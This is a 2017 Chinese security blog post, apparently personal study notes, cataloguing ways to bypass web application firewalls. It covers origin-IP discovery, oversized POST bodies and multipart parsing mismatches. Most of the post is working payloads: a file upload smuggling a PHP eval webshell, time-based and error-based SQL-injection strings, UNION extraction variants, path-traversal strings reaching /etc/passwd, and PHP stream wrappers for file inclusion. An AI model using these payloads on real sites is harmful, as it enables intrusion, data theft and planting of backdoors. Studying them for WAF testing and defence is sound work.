<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="waf bypass," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="关于waf bypass的一些汇总和总结，大部分资源来自网络，仅供自己学习总结">
<meta name="keywords" content="waf bypass">
<meta property="og:type" content="article">
<meta property="og:title" content="wafbypass总结">
<meta property="og:url" content="https://sn0wdown.github.io/2017/09/19/2017-09-19-wafbypass总结/index.html">
<meta property="og:site_name" content="sn0wdown&#39;s blog">
<meta property="og:description" content="关于waf bypass的一些汇总和总结，大部分资源来自网络，仅供自己学习总结">
<meta property="og:updated_time" content="2017-09-19T09:05:09.937Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="wafbypass总结">
<meta name="twitter:description" content="关于waf bypass的一些汇总和总结，大部分资源来自网络，仅供自己学习总结">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'sn0wdown'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://sn0wdown.github.io/2017/09/19/2017-09-19-wafbypass总结/"/>





  <title>wafbypass总结 | sn0wdown's blog</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?006d53aee48ead6040061b9e893cd3cb";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>











  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">sn0wdown's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">love my monster</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://sn0wdown.github.io/2017/09/19/2017-09-19-wafbypass总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="sn0wdown">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/upload_image/pic.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="sn0wdown's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">wafbypass总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2017-09-19T16:31:28+08:00">
                2017-09-19
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/奇技淫巧/" itemprop="url" rel="index">
                    <span itemprop="name">奇技淫巧</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/09/19/2017-09-19-wafbypass总结/" class="leancloud_visitors" data-flag-title="wafbypass总结">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数 </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          
              <div class="post-description">
                  关于waf bypass的一些汇总和总结，大部分资源来自网络，仅供自己学习总结
              </div>
          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="waf攻防研究的4个层次"><a href="#waf攻防研究的4个层次" class="headerlink" title="waf攻防研究的4个层次"></a>waf攻防研究的4个层次</h2><blockquote>
<ul>
<li>从架构层bypass waf</li>
<li>从资源层bypass waf</li>
<li>从协议层bypass waf</li>
<li>从规则缺陷bypass waf</li>
</ul>
</blockquote>
<h3 id="从架构层bypass-waf"><a href="#从架构层bypass-waf" class="headerlink" title="从架构层bypass waf"></a>从架构层bypass waf</h3><h4 id="寻找源站"><a href="#寻找源站" class="headerlink" title="寻找源站"></a><strong>寻找源站</strong></h4><p>也就是说发现目标源IP地址。当前多数云WAF架构，例如百度云加速、360安全卫士等，通过更改DNS解析，把流量引入WAF集群，流量经过检测后转发请求到源站。用户的请求将先发送给WAF集群，WAF集群经过检测认为非攻击请求再转发给源站，常用方法如下：</p>
<p>1) <em>信息泄露发现源站IP</em></p>
<blockquote>
<ul>
<li>网站页面注释是否包含源站IP</li>
<li>GIHUB源代码泄露是否包含源站IP</li>
<li>未接入WAF前，真实IP地址是否被搜索引擎等服务收</li>
</ul>
</blockquote>
<p>2) <em>穷举IP地址，根据特征发现服务器真实IP地址</em></p>
<p>对于国内的服务器，穷举国内的IP，访问每个IP的HTTP服务，根据页面特征检测响应页面，判断IP是否为源站IP地址。曾经乌云有人分享过，完成一次国内IP扫描只需要8-9小时</p>
<h4 id="利用同网段"><a href="#利用同网段" class="headerlink" title="利用同网段"></a><strong>利用同网段</strong></h4><p>一些在云服务商的站点，同时使用云服务商提供的WAF服务。当流量不是通过DNS解析引流到WAF，流量必须经过WAF的检测，这时不能通过发行源站进行绕过。可以考虑在云服务商买一台VPS，通过VPS攻击目标站点，因为流量是局域网，可能不经过WAF检测，实现绕过。能不能成功，关键在于云服务商的网络配置</p>
<h4 id="利用边界漏洞"><a href="#利用边界漏洞" class="headerlink" title="利用边界漏洞"></a><strong>利用边界漏洞</strong></h4><p>如果未能发现源站IP，可以尝试寻找子站的SSRF漏洞。如果子站访问目标站不经过WAF集群，可以利用SSRF漏洞来绕过WAF。</p>
<h3 id="从资源层bypass-waf"><a href="#从资源层bypass-waf" class="headerlink" title="从资源层bypass waf"></a>从资源层bypass waf</h3><p>这是众所周知、而又难以解决的问题。如果HTTP请求POST BODY太大，检测所有的内容，WAF集群消耗太大的CPU、内存资源。因此许多WAF只检测前面的几K字节、1M、或2M。对于攻击者而然，只需要在POST BODY前面添加许多无用数据，把攻击payload放在最后即可绕过WAF检测。</p>
<h3 id="从协议层bypass-waf"><a href="#从协议层bypass-waf" class="headerlink" title="从协议层bypass waf"></a>从协议层bypass waf</h3><p>即使流量都确保经过WAF，如果WAF的防御策略根本就没有检测payload，那么也就能绕过WAF。协议层面绕过WAF，利用WAF解析协议的问题，使得payload被认为不是请求的HTTP请求的内容。从个人经验总结出WAF解析协议的常出现问题的三个方向。</p>
<blockquote>
<ul>
<li>协议覆盖不全</li>
<li>协议解析不正确</li>
<li>协议解析与后WEB容器的协议解析不一致</li>
</ul>
</blockquote>
<h4 id="协议未覆盖绕过waf"><a href="#协议未覆盖绕过waf" class="headerlink" title="协议未覆盖绕过waf"></a><strong>协议未覆盖绕过waf</strong></h4><p>POST 请求常用有2种参数提交方式：</p>
<pre><code>Content-Type: application/x-www-form-urlencoded;
Content-Type: multipart/form-data;
</code></pre><p>Waf未能覆盖Content-Type: multipart/form-data从而导致被绕过。或者WAF会认为它是文件上传请求，从而只检测文件上传，导致被绕过。如图，加速乐的WAF就存在被绕过的情况，是典型的协议未覆盖。</p>
<h4 id="利用协议解析不一致绕过WAF"><a href="#利用协议解析不一致绕过WAF" class="headerlink" title="利用协议解析不一致绕过WAF"></a><strong>利用协议解析不一致绕过WAF</strong></h4><p><a href="http://weibo.com/ttarticle/p/show?id=2309404002575157473609" target="_blank" rel="external">PHP DOS漏洞的新利用：CVE-2015-4024</a><br>绕过WAF的关键在于，PHP multipart_buffer_headers函数解析header对应value时，value值存在多行。每行的字符串以空白符开头或不存字符’:’，将进行合并。而WAF在解析文件上传的文件名时，没有考虑协议兼容，不进行多行合并，就可以被绕过。</p>
<p>WAF绕过payload:</p>
<pre><code>------WebKitFormBoundaryx7V4AhipWn8ig52y
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;test3.jpg\nsf/shell.php
Content-Type: application/octet-stream

&lt;?php eval($_GET[&apos;c&apos;])?&gt;
------WebKitFormBoundaryx7V4AhipWn8ig52y
</code></pre><h4 id="利用协议解析问题绕过WAF文件上传"><a href="#利用协议解析问题绕过WAF文件上传" class="headerlink" title="利用协议解析问题绕过WAF文件上传"></a><strong>利用协议解析问题绕过WAF文件上传</strong></h4><p>WAF的文件上传规则使用正则表达式匹配上传的文件名是否包含“0x00”等，所以正面绕过正则表达式匹配几乎不可能。如果不从规则角度考虑，利用协议解析问题让WAF无法匹配到正确的文件名，就能绕过WAF实现文件上传。</p>
<p>1） <em>协议解析不正确-文件名覆盖(一)</em></p>
<p>在multipart协议中，一个文件上传块存在多个Content-Disposition，将以最后一个Content-Disposition的filename值作为上传的文件名。许多WAF解析到第一个Content-Disposition就认为协议解析完毕，获得上传的文件名，从而导致被绕过。加速乐的WAF解析得到文件名是”sp.pho”，但PHP解析结果是”sp.php”，导致被绕过。</p>
<pre><code>Content-Disposition: form-data;name=&quot;file&quot;;filename=&quot;sp.pho&quot;
Content-Disposition: form-data;name=&quot;file&quot;;filename=&quot;sp.php&quot;
</code></pre><p>2） <em>协议解析不正确-文件名覆盖(二)</em></p>
<p>在一个Content-Disposition 中，存在多个filename ，协议解析应该使用最后的filename值作为文件名。如果WAF解析到filename=”p3.txt”认为解析到文件名，结束解析，将导致被绕过。因为后端容器解析到的文件名是t3.jsp。</p>
<pre><code>Content-Disposition: form-data;name=”myfile”;filename=”p3.txt”;filename=”t3.jsp”
</code></pre><p>3） <em>协议解析不正确-遗漏文件名</em></p>
<p>当WAF遇到“name=”myfile”;;”时，认为没有解析到filename。而后端容器继续解析到的文件名是t3.jsp，导致WAF被绕过。</p>
<pre><code>Content-Disposition: form-data;name=”myfile”;; filename=”t3.jsp”
</code></pre><p>4） <em>协议解析不正确-未解析所有文件</em></p>
<p>multipart协议中，一个POST请求可以同时上传多个文件。如图，许多WAF只检查第一个上传文件，没有检查上传的所有文件，而实际后端容器会解析所有上传的文件名，攻击者只需把paylaod放在后面的文件PART，即可绕过。双文件上传。</p>
<p>5） <em>协议解析不正确-文件名解析兼容性</em></p>
<p>multipart协议中，文件名的形式为 filename=”abc.php”。但是Tomcat、PHP等容器解析协议时会做一些兼容，能正确解析 filename=”abc.php、filename=abc.php、 filename=’abc.php’。而WAF只按照协议标准去解析，无法解析文件名，但是后端容器能正确获得文件名，从而导致被绕过。场景的绕过形式：</p>
<pre><code>Content-Disposition: form-data; name=”file”; filename=abc.php
Content-Disposition: form-data; name=”file”; filename=”abc.php
Content-Disposition: form-data; name=”file”; filename=’abc.php’
</code></pre><h4 id="参数污染"><a href="#参数污染" class="headerlink" title="参数污染"></a><strong>参数污染</strong></h4><p>请求中包含2个参数名相同的参数typeid，第一个是正常参数的值正常，第二个参数才是payload。如果WAF解析参数使用第一个值，没检查第二个值，将导致绕过。这是很久很久的一个CASE，现在几乎没有WAF存在这个问题。</p>
<pre><code>/forum.php?typeid=644&amp;typeid=if(now()%3dsysdate()%2csleep(19.844)%2c0)/*&apos;XOR(if(now()%3dsysdate()%2csleep(19.844)%2c0))OR&apos;%22XOR(if(now()%3dsysdate()%2csleep(19.844)%2c0))OR%22*/
</code></pre><h3 id="从规则缺陷bypass-waf"><a href="#从规则缺陷bypass-waf" class="headerlink" title="从规则缺陷bypass waf"></a>从规则缺陷bypass waf</h3><p>对基于正则表达式的WAF，绕过WAF规则主要思考安全工程师写WAF规则时在想什么，容易忽略什么，推断一些可能绕过的方式，然后多次尝试进行验证。比起完整罗列绕过CASE，我更喜欢分析绕过思路。这次以最受关注的SQL注入、文件包含为例，分析一下绕过思路。</p>
<h4 id="SQL注入绕过"><a href="#SQL注入绕过" class="headerlink" title="SQL注入绕过"></a><strong>SQL注入绕过</strong></h4><p>绕过SQL注入规则主要利用WAF规则本身的问题、未考虑到SQL语法变形、及后端数据库SQL语句语法特性。不同的数据库虽然遵守SQL标准，但是通常会加入特有的语法。WAF的防御策略要兼顾各种数据库的特殊语法，容易遗漏，从而被利用绕过WAF。以下MySQL为例，分析绕过SQL注入的一些思路。</p>
<p>1) <em>注释符绕过</em></p>
<pre><code>/*xxx*/是注释，也可以充当空白符。因为 /**/可使得MySQL对sql语句(union/**/select)词法解析成功。事实上许多WAF都考虑到/**/可以作为空白符，但是waf检测 /\*.*\*/ 很消耗性能，工程师会折中，可能在检测中间引入一些特殊字符，例如：/*\w+*/。或者，WAF可能只中间检查n个字符/\*.{,n}\*/。根据以上想法，可以逐步测试绕过方法：

先测试最基本的：union/**/select
再测试中间引入特殊字：union/*aaaa%01bbs*/select
最后测试注释长度：union*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa*/select

同理，对于/*!xxx*/，可以采取类似的思路绕过WAF。 
</code></pre><p>2) <em>空白符绕过</em></p>
<p>基于正则表达式的WAF， SQL注入规则使用正则表达式的“\s”匹配空格，例如”select\s+union”。利用正则表达式的空白符与MySQL空白符的不同可绕过WAF规则。如何这些MySQL的特性? 通过fuzz,每次更改正常SQL语句的某部分，替换为其他字符，判断语法是否正确，即可判断出来MySQL语法特性。当然，也可以通过分析MySQL词法来发现语法特性，从而找到绕过方法。</p>
<p>利用空白符进行绕过，测试WAF时尽可能减少其他原因的影响，例如”union select”被拦截，只需把中间空白符替换为”%250C”, “%25A0”进行绕过测试。</p>
<pre><code>union%250Cselect
union%25A0select

| MySQL的空白字符    | %09,%0A,%0B,%0C,%0D,%20,%A0,/*xx*/     
| 正则表达式空白字符  | %09,%0A,%0B,%0D,%20  
</code></pre><p>3) <em>函数分隔符</em></p>
<p>对基于正则表达式的WAF，我们猜测安全工程师写WAF规则时，可能不知道函数名与左括号之间可以存在特殊字符，或者遗漏可以存在特殊字符。例如匹配函数”concat()”的规则写法，“concat(”或者”concat\s*(”，就没有考虑到一些特殊字符。相应的绕过方法，在特殊位置引入特殊的分隔符，逐个测试。这些特殊分隔符发现也是通过Fuzz出来的。</p>
<pre><code>concat%2520(
concat/**/(
concat%250c(
concat%25a0(
</code></pre><p>4) <em>浮点数词法解析</em></p>
<p>利用MySQL解析浮点数的特点，正则表达式无法匹配出单词union，但是MySQL词法解析成功解析出浮点数、sql关键字union。</p>
<pre><code>select * from users where id=8E0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select 1,2,3,4,5,6,7,8,9,0
select * from users where id=\Nunion select 1,2,3,4,5,6,7,8,9,0
</code></pre><p>5) <em>利用error-based进行SQL注入</em></p>
<p>Error-based的SQL注入函数非常容易被忽略，导致WAF规则过滤不完整。随着对MySQL研究越来越深，被发现可用于error-based SQL注入的函数越来越多，同时也给绕过WAF造就了更多机会。常见的函数：</p>
<pre><code>extractvalue(1, concat(0x5c,md5(3)));
updatexml(1, concat(0x5d,md5(3)),1);
GeometryCollection((select*from(select*from(select@@version)f)x))
polygon((select*from(select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()  
</code></pre><p>利用Error-based的SQL注入函数进行绕过时，可以结合函数分隔符，或其他方法灵活运用。</p>
<p>6) <em>MySQL特殊用法</em></p>
<p>最有效的发现手段，还是去读读MySQL词法分析源代码。和协议绕过类似，挖掘SQL标准与MySQL的词法分析差异是发现WAF SQL注入绕过的有效手段。以下是MySQL语法的一个特写：</p>
<pre><code>select{x table_name}from{x information_schema.tables};
</code></pre><h4 id="文件包含绕过"><a href="#文件包含绕过" class="headerlink" title="文件包含绕过"></a><strong>文件包含绕过</strong></h4><p>文件包含分为相对路径、绝对路径文件包含。在相对路径文件包含中，最终根据Linux虚拟文件系统(vfs)的规则查找文件，通过分析vfs的文件路径解析规则，提取其中规则特点，用这些特点去绕过WAF。在绝对文件路径包含中，主要是根据攻击场景，WAF未过滤一些协议、未过滤某些特殊路径。</p>
<p>1) <em>相对路径的绕过</em></p>
<p>写WAF文件包含规则时，如果检测单一的”../”，误报会非常多，所以WAF文件包含规则通常会检测连续的“../”。根据vfs解析路径的语法，解析到“//”文件路径不变，解析到“/./”文件路径依然。 通过避免连续的”../”，从而绕过WAF文件包含规则。Eg: ././..///./.././/../etc//passwd，它等价于../../../etc/passwd</p>
<p>2) <em>绝对路径的绕过（一）</em></p>
<p>WAF没有考虑到路径中插入“/./”、“//”对于vfs解析路径是等价的，导致可被绕过。例如 /etc/./passwd 与 /etc/passwd 是等价的。还可以通过组合“/./”、“//”进行绕过，eg. /etc///.//././/passwd。</p>
<p>对于绝对路径文件包含，WAF一般会拦截常见路径，而不会防御所有的绝对路径。因此，在渗透测试中，可以包含其他的路径下一些文件，例如/usr/local/nginx/conf/nginx.conf。</p>
<p>如果WAF只检测连续的../，检查开始路径为Linux的目录名，可以采用/wtt/../绕过WAF文件包含检测。 例如，“/wtt/../etc/passwd”， wtt不是Linux标准目录，不会被规则匹配。WAF只检测连续的../，但是只使用一个../，不被拦截。最终读取/etc/passwd文件。</p>
<p>3) <em>绝对路径的绕过（二）</em></p>
<p>利用WAF未检测的协议。PHP 文件包含支持的协议，在渗透测试中，看环境选择可行的方法</p>
<pre><code>file:// — Accessing local filesystem
http:// — Accessing HTTP(s) URLs
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
zlib:// — Compression Streams data:// — Data (RFC 2397)
glob:// — Find pathnames matching pattern
phar:// — PHP Archive
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — Audio streams
expect:// — Process Interaction Streams
</code></pre><h2 id="MySQL-bypass小结"><a href="#MySQL-bypass小结" class="headerlink" title="MySQL bypass小结"></a>MySQL bypass小结</h2><h3 id="空白符替换"><a href="#空白符替换" class="headerlink" title="空白符替换"></a>空白符替换</h3><p>空白符替换：%09,%0a,%0b,%0c,%0d,%a0  </p>
<pre><code>id=-1&apos;%0aunion%0aselect%0aflag from flag.flag limit 0,1-- --
</code></pre><h3 id="union姿势变换"><a href="#union姿势变换" class="headerlink" title="union姿势变换"></a>union姿势变换</h3><pre><code>.union (100.union,302.union ...)  
id=xxoo&apos;+100.union select flag from flag.flag#

数字.%0bunion
id=xxoo&apos;-1.%0bunion select flag from flag.flag#
id=xxoo&apos;-1.%0b-1.union select flag from flag.flag%23 

科学计数：8e0union  1e1 3e2
id=8e0union select user()
</code></pre><h3 id="union-select-分割姿势"><a href="#union-select-分割姿势" class="headerlink" title="union select 分割姿势"></a>union select 分割姿势</h3><p>distinctrow, distinct, all  </p>
<pre><code>id=1 union distinctrow select flag from flag.flag#  
id=1 union distinct select flag from flag.flag#  
id=1 union all select flag from flag.flag#
</code></pre><p>过滤了union select，可能会使用如下正则写法过滤：/union\s+select/i （即检测union和select之间的空格）  </p>
<pre><code>1）使用括号绕过检测()，括号可灵活使用，表名、字段均可使用  
2）使用/*!select*/  
3）利用注释符，union/*xxxxxxxxxx*/select
</code></pre><h3 id="select-连接字段姿势"><a href="#select-连接字段姿势" class="headerlink" title="select 连接字段姿势"></a>select 连接字段姿势</h3><pre><code>select.``.    
id=xxoo&apos; union select.``.flag from flag.flag#    

select 后面接 - ~ + ! ”” 或者 @   
id=2312 union select~1,user()   
id=2312 union select &quot;1&quot;,user()
</code></pre><p>@自定义变量  </p>
<pre><code>Id=bs&apos;union distinctrow select(make_set(@i:=-1,&apos;a&apos;,user(),&apos;a&apos;,database(),@i,(select flag from flag.flag)))--+  
</code></pre><p>自定义变量绕过union+select+from案例    </p>
<pre><code>select name from mysql_bypass where id =1 | @xx:=(select user()) union select @xx;
</code></pre><h3 id="MySQL特殊用法：任意插入-随机字符-0b-目标值"><a href="#MySQL特殊用法：任意插入-随机字符-0b-目标值" class="headerlink" title="MySQL特殊用法：任意插入{[随机字符]%0b[目标值]}"></a>MySQL特殊用法：任意插入{[随机字符]%0b[目标值]}</h3><pre><code>id=2312 union select {x @},user()  
id={xsad 12321} and {x sleep(1)}   
id=1 and {xxsadasdas sleep(1)}  
id={asdqwe @} union select (select {12312adas user} from {dasweq mysql.user} limit 1),{asdqwe user()}
</code></pre><h2 id="参考来源"><a href="#参考来源" class="headerlink" title="参考来源"></a>参考来源</h2><p><a href="http://www.mottoin.com/86886.html" target="_blank" rel="external">WAF攻防研究之四个层次Bypass WAF — 破见</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/waf-bypass/" rel="tag"># waf bypass</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/09/14/Samba远程代码执行-CVE-2017-7494/" rel="next" title="Samba远程代码执行(CVE-2017-7494)">
                <i class="fa fa-chevron-left"></i> Samba远程代码执行(CVE-2017-7494)
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/upload_image/pic.jpg"
               alt="sn0wdown" />
          <p class="site-author-name" itemprop="name">sn0wdown</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">6</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://www.freebuf.com" target="_blank" title="freebuf">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  freebuf
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://xianzhi.aliyun.com/forum/" target="_blank" title="先知社区">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  先知社区
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="https://aptx0.github.io/" title="aptx's blog" target="_blank">aptx's blog</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://reverse-tcp.xyz/" title="Urahara's blog" target="_blank">Urahara's blog</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#waf攻防研究的4个层次"><span class="nav-number">1.</span> <span class="nav-text">waf攻防研究的4个层次</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#从架构层bypass-waf"><span class="nav-number">1.1.</span> <span class="nav-text">从架构层bypass waf</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#寻找源站"><span class="nav-number">1.1.1.</span> <span class="nav-text">寻找源站</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用同网段"><span class="nav-number">1.1.2.</span> <span class="nav-text">利用同网段</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用边界漏洞"><span class="nav-number">1.1.3.</span> <span class="nav-text">利用边界漏洞</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#从资源层bypass-waf"><span class="nav-number">1.2.</span> <span class="nav-text">从资源层bypass waf</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#从协议层bypass-waf"><span class="nav-number">1.3.</span> <span class="nav-text">从协议层bypass waf</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#协议未覆盖绕过waf"><span class="nav-number">1.3.1.</span> <span class="nav-text">协议未覆盖绕过waf</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用协议解析不一致绕过WAF"><span class="nav-number">1.3.2.</span> <span class="nav-text">利用协议解析不一致绕过WAF</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用协议解析问题绕过WAF文件上传"><span class="nav-number">1.3.3.</span> <span class="nav-text">利用协议解析问题绕过WAF文件上传</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参数污染"><span class="nav-number">1.3.4.</span> <span class="nav-text">参数污染</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#从规则缺陷bypass-waf"><span class="nav-number">1.4.</span> <span class="nav-text">从规则缺陷bypass waf</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入绕过"><span class="nav-number">1.4.1.</span> <span class="nav-text">SQL注入绕过</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#文件包含绕过"><span class="nav-number">1.4.2.</span> <span class="nav-text">文件包含绕过</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MySQL-bypass小结"><span class="nav-number">2.</span> <span class="nav-text">MySQL bypass小结</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#空白符替换"><span class="nav-number">2.1.</span> <span class="nav-text">空白符替换</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#union姿势变换"><span class="nav-number">2.2.</span> <span class="nav-text">union姿势变换</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#union-select-分割姿势"><span class="nav-number">2.3.</span> <span class="nav-text">union select 分割姿势</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#select-连接字段姿势"><span class="nav-number">2.4.</span> <span class="nav-text">select 连接字段姿势</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MySQL特殊用法：任意插入-随机字符-0b-目标值"><span class="nav-number">2.5.</span> <span class="nav-text">MySQL特殊用法：任意插入{[随机字符]%0b[目标值]}</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考来源"><span class="nav-number">3.</span> <span class="nav-text">参考来源</span></a></li></ol></div>
            

          </div>
        </section>
